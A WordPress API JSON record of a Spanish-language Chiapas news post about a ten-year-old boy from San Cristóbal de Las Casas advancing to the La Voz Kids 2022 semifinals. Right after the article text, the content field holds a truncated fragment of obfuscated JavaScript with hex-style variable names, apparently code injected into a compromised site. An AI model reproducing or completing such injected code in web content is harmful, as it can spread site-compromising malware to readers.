{"id":2454,"date":"2022-05-30T03:07:50","date_gmt":"2022-05-30T03:07:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2454"},"modified":"2022-05-30T03:07:52","modified_gmt":"2022-05-30T03:07:52","slug":"chiapaneco-avanza-a-la-semifinal-de-la-voz-kids","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2454","title":{"rendered":"Chiapaneco avanza a la semifinal de La Voz Kids"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-29-at-12.33.06-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-2455\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-29-at-12.33.06-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-29-at-12.33.06-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-29-at-12.33.06-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-29-at-12.33.06-PM.jpeg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>Chiapaneco avanza a la semifinal de La Voz Kids<\/figcaption><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- El menor, Harald Vera Gamboa, originario de Tuxtla Guti\u00e9rrez, pero radicado en San Crist\u00f3bal es uno quienes se encuentra en la semifinales del programa televisivo &#8220;La Voz Kid 2022&#8243;, programa donde ha demostrado sus dotes en el canto.Entrevistado en San Crist\u00f3bal, previo a las semifinales del certamen nacional, coment\u00f3 que no ha recibido ning\u00fan apoyo de las autoridades para su traslado y con tan solo 10 a\u00f1os de edad, ha pasado por varios filtros para llegar a dicha instancia, donde ha competido con m\u00e1s 5 mil ni\u00f1os de todo el pa\u00eds.Harald es estudiante de la escuela primaria &#8221; Adolfo L\u00f3pez Mateos &#8221; en San Crist\u00f3bal de Las Casas y desde peque\u00f1o ha demostrado su pasi\u00f3n por el canto, que combina con el estudio, pues se sabe tiene buen promedio.En la entrevista cont\u00f3 que se siente identificado con la m\u00fasica regional mexicana, pero ha interpretado melod\u00edas con gran \u00e9xito de los compositores Leo Dan, Ricardo Montaner y Diego Verdaguer.Seg\u00fan \u00e9l, deber\u00edan estar en la final sus compa\u00f1eritos Candy Pulido y Leonardo a quienes reconoce sin envidia alguna como grandes voces y dignos rivales en La Voz Kid 2022. Este lunes podr\u00e1 ver y escuchar a Harald a partir de las 19:30 horas en La Voz Kid.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Chiapaneco avanza a la semifinal de La Voz Kids \u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- El menor, Harald Vera Gamboa, originario de Tuxtla Guti\u00e9rrez, pero radicado en San Crist\u00f3bal es uno quienes se encuentra en la semifinales del programa televisivo &#8220;La Voz Kid 2022&#8243;, programa donde ha demostrado sus dotes en el canto.Entrevistado en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2455,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2454","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2454","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2454"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2454\/revisions"}],"predecessor-version":[{"id":2456,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2454\/revisions\/2456"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2455"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2454"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2454"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2454"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}